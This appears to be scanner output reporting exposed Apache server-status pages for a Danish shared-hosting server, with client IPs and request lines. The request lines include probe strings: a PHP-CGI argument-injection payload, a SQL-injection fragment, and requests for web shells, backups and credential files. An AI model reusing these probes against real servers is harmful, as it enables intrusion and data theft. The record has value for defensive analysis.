HTTP/1.0 48-1-0/0/50. 0.11124150.00.000.02 172.68.22.245webhotel5.webhosting.dkGET /?find-new%2F1039720%2Fposts HTTP/1.0 49-1-0/0/50. 0.1428470.00.000.02 49.13.198.63webhotel5.webhosting.dkGET / HTTP/1.0 50-1-0/0/50. 0.13
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3282febec
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 01-Nov-2024 13:05:21 CET Restart Time: Friday, 01-Nov-2024 07:00:05 CET Parent Server Generation: 6 Server uptime: 6 hours 5 minutes 16 seconds Total accesses: 31723 - Total Traffic: 13.7 MB CPU Usage: u2.55 s1.19 cu0 cs0 - .0171% CPU load 1.45 requests/sec - 655 B/second - 453 B/request 1 requests currently being processed, 30 idle workers __________________________W____................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-6230190/13/913_ 0.037300.00.000.66 122.15.104.234webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 1-6230200/15/889_ 0.058760.00.000.28 43.128.100.206webhotel5.webhosting.dkGET / HTTP/1.0 2-6230270/13/870_ 0.026400.00.000.29 167.253.34.3webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 3-6230210/14/879_ 0.0410610.00.000.64 152.32.140.198webhotel5.webhosting.dkGET /config.json HTTP/1.0 4-6230220/13/910_ 0.047800.00.020.63 89.210.113.88webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 5-6230230/13/893_ 0.037210.00.000.83 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 6-6230240/13/915_ 0.028300.00.000.52 213.153.89.7webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 7-6230250/13/903_ 0.0366120.00.000.26 34.209.87.196webhotel5.webhosting.dkGET / HTTP/1.0 8-6230260/13/905_ 0.027220.00.000.44 94.130.237.182www.valloe.orgGET /motor/ssr0864.htm HTTP/1.0 9-6230280/13/842_ 0.016600.00.000.44 95.108.213.246webhotel5.webhosting.dkGET /en/film/detail/The-Babysitter-18-17990 HTTP/1.0 10-6230290/13/891_ 0.035900.00.000.45 40.77.167.74webhotel5.webhosting.dkGET /collections/musli HTTP/1.0 11-6230300/13/847_ 0.044980.00.000.33 52.33.102.245webhotel5.webhosting.dkGET / HTTP/1.0 12-6230310/13/822_ 0.04307840.00.000.40 49.51.36.179webhotel5.webhosting.dkGET / HTTP/1.0 13-6230320/13/861_ 0.03000.00.000.30 188.166.108.93webhotel5.webhosting.dkGET /server HTTP/1.0 14-6230330/13/812_ 0.0317110.00.000.25 43.157.40.112webhotel5.webhosting.dkGET / HTTP/1.0 15-6230340/13/806_ 0.020100.00.000.34 188.166.108.93webhotel5.webhosting.dkGET / HTTP/1.0 16-6230350/13/844_ 0.031210.00.000.41 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 17-6230360/13/795_ 0.030110.00.010.35 188.166.108.93webhotel5.webhosting.dkGET / HTTP/1.0 18-6230370/13/798_ 0.03000.00.010.43 188.166.108.93webhotel5.webhosting.dkGET /about HTTP/1.0 19-6230380/13/782_ 0.02010.00.000.26 188.166.108.93webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 20-6230600/12/729_ 0.027600.00.000.28 81.19.232.105www.brandstation.infoail/config-v1.1.xml?emailaddress=foo@brandstation.info HTTP/1.0 21-6230800/12/775_ 0.033520.00.000.24 94.130.237.182www.valloe.orgGET /motor/ssr0613.htm HTTP/1.0 22-6231070/12/824_ 0.02000.00.000.29 188.166.108.93webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 23-6231220/12/822_ 0.02000.00.000.29 188.166.108.93webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 24-6231310/12/823_ 0.01000.00.000.33 188.166.108.93webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 25-6231440/12/813_ 0.03000.00.000.44 188.166.108.93webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 26-6231720/11/810W 0.02000.00.000.32 188.166.108.93webhotel5.webhosting.dkGET /server-status HTTP/1.0 27-6232090/11/702_ 0.04105120.00.000.19 136.143.177.50webhotel5.webhosting.dkGET / HTTP/1.0 28-6232370/11/765_ 0.03100540.00.000.21 81.19.232.105www.brandstation.infoPOST /autodiscover/autodiscover.xml HTTP/1.0 29-6232560/11/739_ 0.0186540.00.000.20 81.19.232.105www.brandstation.infoPOST /autodiscover/autodiscover.xml HTTP/1.0 30-6242440/11/589_ 0.03180.00.000.16 43.128.110.17webhotel5.webhosting.dkGET / HTTP/1.0 31-5-0/0/626. 0.0031400.00.000.36 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 32-5-0/0/564. 0.0031400.00.000.38 95.6.64.9webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 33-5-0/0/475. 0.0031400.00.000.15 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 34-5-0/0/474. 0.0231400.00.000.15 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 35-5-0/0/410. 0.0131400.00.000.24 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 36-5-0/0/410. 0.0131400.00.000.11 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-5-0/0/386. 0.0031400.00.000.11 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 38-5-0/0/355. 0.0031400.00.000.12 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-5-0/0/205. 0.0131400.00.000.06 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-5-0/0/150. 0.1163800.00.000.04 34.41.186.124webhotel5.webhosting.dkPOST /api/pull HTTP/1.0 41-5-0/0/150. 0.1163100.00.000.04 34.41.186.124webhotel5.webhosting.dkPUT /api/v2/simulation HTTP/1.0 42-5-0/0/150. 0.1265620.00.000.04 94.130.237.182www.valloe.orgGET /motor/lm07050.htm HTTP/1.0 43-5-0/0/150. 0.1163100.00.000.04 34.41.186.124webhotel5.webhosting.dkw_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 44-5-0/0/150. 0.1263370.00.000.04 34.41.186.124webhotel5.webhosting.dkGET / HTTP/1.0 45-5-0/0/100. 0.1065200.00.000.02 34.41.186.124webhotel5.webhosting.dkDHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.0 46-5-0/0/100. 0.1265510.00.000.02 34.41.186.124webhotel5.webhosting.dkGET /wp-content/uploads/fusion-forms/ HTTP/1.0 47-5-0/0/100. 0.1262300.00.000.03 34.41.186.124webhotel5.webhosting.dkays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect HTTP/1.0 48-5-0/0/100. 0.1365600.00.000.02 34.41.186.124webhotel5.webhosting.dkPOST /protocol/index.php HTTP/1.0 49-5-0/0/100. 0.1364200.00.000.03 34.41.186.124webhotel5.webhosting.dkGET /admin/diagnostic.jsp HTTP/1.0 50-5-0/0/100. 0.1263100.00.000.02 34.41.186.124webhotel5.webhosting.dkGET /core/authorize.php HTTP/1.0 51-5-0/0/100. 0.1164
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde340f185b7
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Wednesday, 30-Oct-2024 14:44:59 CET Restart Time: Wednesday, 30-Oct-2024 06:05:04 CET Parent Server Generation: 8 Server uptime: 8 hours 39 minutes 55 seconds Total accesses: 59381 - Total Traffic: 22.6 MB CPU Usage: u1.49 s.88 cu0 cs0 - .0076% CPU load 1.9 requests/sec - 759 B/second - 399 B/request 1 requests currently being processed, 29 idle workers __W_______________________...____............................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-8355310/34/1639_ 0.041100.00.012.60 37.120.207.148webhotel5.webhosting.dkGET /tmps/ HTTP/1.0 1-8356240/34/1594_ 0.03000.00.010.63 128.199.182.55webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 2-8356290/32/1615W 0.02000.00.010.53 128.199.182.55webhotel5.webhosting.dkGET /server-status HTTP/1.0 3-8356300/33/1663_ 0.032000.00.010.52 213.180.203.160webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 4-8356650/33/1585_ 0.041200.00.010.56 95.159.86.235webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 5-8356710/33/1605_ 0.03500.00.010.65 37.120.207.148webhotel5.webhosting.dkGET /wp-admin/css/colors/midnight/ HTTP/1.0 6-8354980/34/1654_ 0.031600.00.010.63 37.120.207.148webhotel5.webhosting.dkGET /home/ HTTP/1.0 7-8355440/34/1609_ 0.03300.00.010.53 128.199.182.55webhotel5.webhosting.dkGET /server HTTP/1.0 8-8357860/32/1577_ 0.031000.00.010.43 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 9-8357840/32/1492_ 0.031400.00.010.44 37.120.207.148webhotel5.webhosting.dkGET /mt/ HTTP/1.0 10-8356310/33/1568_ 0.031900.00.010.52 87.250.224.13webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 11-8356770/33/1511_ 0.02430.00.010.44 128.199.182.55webhotel5.webhosting.dkGET / HTTP/1.0 12-8356720/33/1539_ 0.03700.00.010.46 37.120.207.148webhotel5.webhosting.dkGET /wp-admin/css/colors/light/ HTTP/1.0 13-8357870/32/1516_ 0.03900.00.010.48 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 14-8357880/32/1538_ 0.03900.00.010.57 37.120.207.148webhotel5.webhosting.dkGET /wordpress/wp-admin/includes/wp-admin/js/ HTTP/1.0 15-8356940/33/1510_ 0.02300.00.010.48 128.199.182.55webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 16-8356950/33/1508_ 0.03300.00.010.46 37.120.207.148webhotel5.webhosting.dkGET /wp-admin/css/colors/modern/ HTTP/1.0 17-8357550/33/1563_ 0.03100.00.010.50 128.199.182.55webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 18-8357640/33/1527_ 0.03100.00.010.46 128.199.182.55webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 19-8357740/32/1468_ 0.021800.00.010.46 5.255.231.195webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 20-8357850/31/1447_ 0.031310.00.010.49 37.120.207.148webhotel5.webhosting.dkGET /site/wp-includes/ HTTP/1.0 21-8404730/2/1433_ 0.001900.00.000.44 37.120.207.148webhotel5.webhosting.dkGET /admin/tmp/ HTTP/1.0 22-8357890/32/1514_ 0.03800.00.010.49 95.108.213.88webhotel5.webhosting.dkGET /film/detaljer/Heavenly-Whores-20842 HTTP/1.0 23-8355320/34/1399_ 0.03440.00.011.25 128.199.182.55webhotel5.webhosting.dkGET / HTTP/1.0 24-8404760/1/1423_ 0.001800.00.000.47 37.120.207.148webhotel5.webhosting.dkGET /administrator/ HTTP/1.0 25-8404770/1/1377_ 0.0017480.00.010.47 81.19.232.105www.sydsjaellandsgarderforeningGET /love.php HTTP/1.0 26-8-0/0/1325. 0.063800.00.000.76 13.79.156.94webhotel5.webhosting.dkGET /wp-admin/js/widgets/cloud.php HTTP/1.0 27-8-0/0/1413. 0.053800.00.000.44 13.79.156.94webhotel5.webhosting.dkGET /wp-admin/css/colors/blue/cloud.php HTTP/1.0 28-8-0/0/1324. 0.053800.00.000.48 13.79.156.94webhotel5.webhosting.dkGET /wp-admin/cloud.php HTTP/1.0 29-8354600/35/1362_ 0.03000.00.010.38 37.120.207.148webhotel5.webhosting.dkGET /wp-admin/css/colors/sunrise/ HTTP/1.0 30-8355450/34/1308_ 0.04200.00.010.40 128.199.182.55webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 31-8355460/33/1232_ 0.03200.00.010.35 128.199.182.55webhotel5.webhosting.dkGET /about HTTP/1.0 32-8355470/34/1147_ 0.04100.00.010.35 37.120.207.148webhotel5.webhosting.dkGET /wp-admin/css/colors/ocean/ HTTP/1.0 33-8-0/0/1042. 0.05225300.00.000.37 34.28.253.183webhotel5.webhosting.dkGET /mail/logs/sendmail.log HTTP/1.0 34-8-0/0/1022. 0.04222300.00.000.36 34.28.253.183webhotel5.webhosting.dkGET /backup_3.jar HTTP/1.0 35-8-0/0/922. 0.05221500.00.000.36 34.28.253.183webhotel5.webhosting.dkGET /backup_4.sql.tar.gz HTTP/1.0 36-8-0/0/857. 0.04222000.00.000.40 34.28.253.183webhotel5.webhosting.dkGET /backup_3.sql.tar.z HTTP/1.0 37-8-0/0/840. 0.06156700.00.000.30 138.199.19.178webhotel5.webhosting.dkGET /dropdown.php?p= HTTP/1.0 38-8-0/0/739. 0.05156800.00.000.20 138.199.19.178webhotel5.webhosting.dkGET /wp-content/plugins/azra-tn/wso.php HTTP/1.0 39-8-0/0/637. 0.05157000.00.000.18 138.199.19.178webhotel5.webhosting.dkGET /wp-includes/images/smilies/about.php HTTP/1.0 40-7-0/0/574. 0.06391800.00.000.19 52.169.218.55webhotel5.webhosting.dkGET /wp-includes/function.php HTTP/1.0 41-7-0/0/524. 0.05391800.00.000.14 52.169.218.55webhotel5.webhosting.dkGET /cgi-bin/404.php HTTP/1.0 42-7-0/0/477. 0.05391900.00.000.14 52.169.218.55webhotel5.webhosting.dkGET /.well-known/index.php HTTP/1.0 43-7-0/0/474. 0.04391900.00.000.13 52.169.218.55webhotel5.webhosting.dkGET /cgi-bin/file.php HTTP/1.0 44-7-0/0/424. 0.04391800.00.000.11 52.169.218.55webhotel5.webhosting.dkGET /wp-admin/themes.php HTTP/1.0 45-7-0/0/373. 0.05391900.00.000.11 52.169.218.55webhotel5.webhosting.dkGET /admin/upload/css.php HTTP/1.0 46-7-0/0/203. 0.04391900.00.000.06 52.169.218.55webhotel5.webhosting.dkGET /wp-content/dropdown.php HTTP/1.0 47-7-0/0/166. 0.05391900.00.000.04 52.169.218.55webhotel5.webhosting.dkGET /wp-includes/404.php HTTP/1.0 48-7-0/0/116. 0.05391900.00.000.03 52.169.218.55webhotel5.webhosting.dkGET /wp-content/themes.php HTTP/1.0 49-7-0/0/116. 0.05391800.00.000.03 52.169.218.55webhotel5.webhosting.dkGET /cgi-bin/index.php HTTP/1.0 50-7-0/0/116<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde39b2d37ec
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Saturday, 26-Oct-2024 11:32:21 CEST Restart Time: Saturday, 26-Oct-2024 06:10:08 CEST Parent Server Generation: 5 Server uptime: 5 hours 22 minutes 13 seconds Total accesses: 33651 - Total Traffic: 22.4 MB CPU Usage: u2.04 s1.28 cu0 cs0 - .0172% CPU load 1.74 requests/sec - 1213 B/second - 696 B/request 1 requests currently being processed, 30 idle workers ___________W___...__________..._.._____......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-5618470/33/1038_ 0.071260.00.010.56 198.235.24.224webhotel5.webhosting.dkGET / HTTP/1.0 1-5618840/31/1033_ 0.07700.00.010.42 138.246.253.24webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 2-5618490/33/1032_ 0.11100.00.010.63 142.93.0.66webhotel5.webhosting.dkGET /server HTTP/1.0 3-5618850/32/1029_ 0.061100.00.010.46 73.94.55.155webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 4-5618780/33/1031_ 0.06100.00.020.45 142.93.0.66webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 5-5618860/32/1022_ 0.07910.00.011.97 13.39.148.135webhotel5.webhosting.dkGET /01.php HTTP/1.0 6-5618870/32/1019_ 0.06500.00.011.14 13.39.148.135webhotel5.webhosting.dkGET /1.php HTTP/1.0 7-5618930/32/1020_ 0.08010.00.021.27 142.93.0.66webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 8-5618880/32/1017_ 0.08100.00.020.51 142.93.0.66webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 9-5618940/32/1014_ 0.07000.00.020.54 142.93.0.66webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 10-5618950/31/1016_ 0.0873100.00.020.47 198.235.24.56webhotel5.webhosting.dkGET / HTTP/1.0 11-5618960/31/941W 0.06000.00.020.38 142.93.0.66webhotel5.webhosting.dkGET /server-status HTTP/1.0 12-5618970/32/941_ 0.06000.00.020.75 142.93.0.66webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 13-5618980/31/929_ 0.065800.00.020.49 13.39.148.135webhotel5.webhosting.dkGET /about.php HTTP/1.0 14-5618990/31/927_ 0.065710.00.020.53 13.39.148.135webhotel5.webhosting.dkGET /upload.php?mr=exe3 HTTP/1.0 15-5-0/0/895. 0.1345900.00.000.42 185.104.184.196webhotel5.webhosting.dkGET /wp-admin/css/index.php HTTP/1.0 16-5-0/0/892. 0.1445900.00.000.35 185.104.184.196webhotel5.webhosting.dkGET /.well-known/pki-validation/2index.php HTTP/1.0 17-5-0/0/894. 0.1445900.00.000.40 185.104.184.196webhotel5.webhosting.dkGET /wp-admin/network/index.php HTTP/1.0 18-5618500/33/910_ 0.06290.00.020.41 142.93.0.66webhotel5.webhosting.dkGET / HTTP/1.0 19-5618790/33/918_ 0.06300.00.010.47 13.39.148.135webhotel5.webhosting.dkGET /02.php HTTP/1.0 20-5618890/32/851_ 0.07250.00.010.35 142.93.0.66webhotel5.webhosting.dkGET / HTTP/1.0 21-5618800/32/911_ 0.0615120.00.010.45 136.143.177.50webhotel5.webhosting.dkGET / HTTP/1.0 22-5618810/32/904_ 0.0528140.00.012.38 170.106.171.77www.brandstation.infoGET / HTTP/1.0 23-5618900/32/903_ 0.06100.00.010.40 142.93.0.66webhotel5.webhosting.dkGET /about HTTP/1.0 24-5618910/32/899_ 0.06000.00.020.42 139.135.71.238webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 25-5619000/31/898_ 0.064500.00.020.46 13.39.148.135webhotel5.webhosting.dkGET /2index.php HTTP/1.0 26-5619010/31/899_ 0.065010.00.020.46 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 27-5619020/31/849_ 0.063510.00.020.49 13.39.148.135webhotel5.webhosting.dkGET /C.php HTTP/1.0 28-5-0/0/802. 0.1245900.00.000.34 185.104.184.196webhotel5.webhosting.dkGET /wp-content/themes/seotheme/mar.php HTTP/1.0 29-5-0/0/791. 0.1245900.00.000.36 13.37.220.100webhotel5.webhosting.dkGET /wp-includes/1index.php?pass=am*guAW8.ryDgz-TYF HTTP/1.0 30-5-0/0/783. 0.1344300.00.000.35 185.104.184.196webhotel5.webhosting.dkGET /randkeyword.PhP8 HTTP/1.0 31-5619030/31/813_ 0.0647940.00.020.54 5.133.192.146webhotel5.webhosting.dkGET / HTTP/1.0 32-5-0/0/758. 0.1444400.00.000.32 185.104.184.196webhotel5.webhosting.dkGET /wp-includes/ID3/index.php HTTP/1.0 33-5-0/0/677. 0.1144300.00.000.25 185.104.184.196webhotel5.webhosting.dkGET /.well-known/about.php HTTP/1.0 34-5619040/31/551_ 0.064780.00.021.35 198.235.24.164webhotel5.webhosting.dkGET / HTTP/1.0 35-5619050/31/476_ 0.0622170.00.030.22 81.19.232.100webhotel5.webhosting.dkGET /server-status HTTP/1.0 36-5619070/31/426_ 0.053310.00.020.21 66.249.64.226webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 37-5619080/31/376_ 0.052600.00.010.20 13.39.148.135webhotel5.webhosting.dkGET /c.php HTTP/1.0 38-5619090/31/259_ 0.063460.00.010.11 43.153.216.189webhotel5.webhosting.dkGET / HTTP/1.0 39-4-0/0/211. 0.09268800.00.000.06 159.89.207.126webhotel5.webhosting.dkGET /wp-admin/options.php HTTP/1.0 40-0-0/0/24. 0.061633300.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-0-0/0/24. 0.051633300.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-0-0/0/24. 0.051633300.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-0-0/0/24. 0.051633310.00.000.01 52.169.227.48webhotel5.webhosting.dkGET /images/about.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde390480db3
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Thursday, 24-Oct-2024 08:44:12 CEST Restart Time: Thursday, 24-Oct-2024 06:05:04 CEST Parent Server Generation: 2 Server uptime: 2 hours 39 minutes 8 seconds Total accesses: 9992 - Total Traffic: 8.8 MB CPU Usage: u3.5 s1.66 cu0 cs0 - .054% CPU load 1.05 requests/sec - 965 B/second - 922 B/request 1 requests currently being processed, 32 idle workers __W______________________.________.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-2400820/49/322_ 0.16000.00.020.20 138.68.82.23webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 1-2398570/49/320_ 0.15000.00.020.48 138.68.82.23webhotel5.webhosting.dkGET /about HTTP/1.0 2-2398580/48/319W 0.14000.00.020.58 138.68.82.23webhotel5.webhosting.dkGET /server-status HTTP/1.0 3-2403800/48/311_ 0.125100.00.020.17 138.246.253.24webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 4-2408170/48/311_ 0.154110.00.010.21 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-2412180/48/311_ 0.133750.00.020.56 81.19.232.105www.karenborup.dkGET / HTTP/1.0 6-2413410/48/310_ 0.133710.00.020.15 81.19.232.105www.karenborup.dkGET /favicon.ico HTTP/1.0 7-2416640/48/308_ 0.151510.00.020.13 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 8-2417310/48/308_ 0.163200.00.030.13 185.211.59.87webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 9-2413690/48/308_ 0.113390.00.010.16 145.239.10.137webhotel5.webhosting.dkGET /config.php HTTP/1.0 10-2423020/48/308_ 0.161150.00.020.23 136.143.177.51webhotel5.webhosting.dkGET / HTTP/1.0 11-2423810/47/274_ 0.17060.00.010.14 138.68.82.23webhotel5.webhosting.dkGET / HTTP/1.0 12-2428710/46/305_ 0.163720.00.010.19 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 13-2423660/48/308_ 0.142980.00.010.14 165.232.43.229webhotel5.webhosting.dkGET / HTTP/1.0 14-2423800/48/308_ 0.14060.00.020.28 138.68.82.23webhotel5.webhosting.dkGET / HTTP/1.0 15-2423820/48/308_ 0.1521130.00.010.14 165.232.43.229webhotel5.webhosting.dkGET / HTTP/1.0 16-2423830/48/308_ 0.12010.00.010.12 138.68.82.23webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 17-2423840/48/308_ 0.12020.00.010.17 138.68.82.23webhotel5.webhosting.dkGET /server HTTP/1.0 18-2423990/47/307_ 0.134400.00.010.13 213.180.203.113webhotel5.webhosting.dkGET /en/livecam HTTP/1.0 19-2423850/48/307_ 0.12000.00.010.16 138.68.82.23webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 20-2424000/47/308_ 0.174700.00.020.30 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-2424010/47/306_ 0.133300.00.020.13 145.239.10.137webhotel5.webhosting.dkGET /root.php HTTP/1.0 22-2406280/48/307_ 0.125100.00.010.13 66.249.69.66webhotel5.webhosting.dkGET /ads.txt HTTP/1.0 23-2426570/47/306_ 0.1317480.00.020.13 66.249.73.38www.tutak.dkT /volga/volga/volga2/slides/202%20Rybinsk-slusen.html HTTP/1.0 24-2406930/48/274_ 0.1638320.00.050.21 167.71.48.197www.karenborup.dkGET / HTTP/1.0 25-2-0/0/267. 0.145600.00.000.32 66.249.77.225webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 26-2428770/45/254_ 0.155010.00.020.74 66.249.69.197webhotel5.webhosting.dkGET /ads.txt HTTP/1.0 27-2428780/45/254_ 0.133880.00.030.12 167.71.48.197www.karenborup.dkGET /favicon.ico HTTP/1.0 28-2491500/29/238_ 0.08700.00.010.52 66.249.65.100webhotel5.webhosting.dkGET /aktiviteter/uzi-paintball/feed/ HTTP/1.0 29-2491590/29/236_ 0.11480.00.010.78 139.59.177.211webhotel5.webhosting.dkGET / HTTP/1.0 30-2491600/29/238_ 0.101100.00.010.48 104.255.160.119webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 31-2398160/49/207_ 0.14000.00.010.08 138.68.82.23webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 32-2413700/48/198_ 0.153300.00.030.11 145.239.10.137webhotel5.webhosting.dkGET /roots.php HTTP/1.0 33-2423860/48/180_ 0.16000.00.010.10 138.68.82.23webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 34-1-0/0/100. 0.12290800.00.000.06 156.146.33.80webhotel5.webhosting.dkGET /wp-content/plugins/ttxecy/index.php HTTP/1.0 35-1-0/0/50. 0.12290400.00.000.05 156.146.33.80webhotel5.webhosting.dkGET /lufix.php HTTP/1.0 36-1-0/0/50. 0.12290400.00.000.04 156.146.33.80webhotel5.webhosting.dkGET /init.php HTTP/1.0 37-1-0/0/50. 0.12290400.00.000.03 156.146.33.80webhotel5.webhosting.dkGET /plugins.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde348e2c9b7
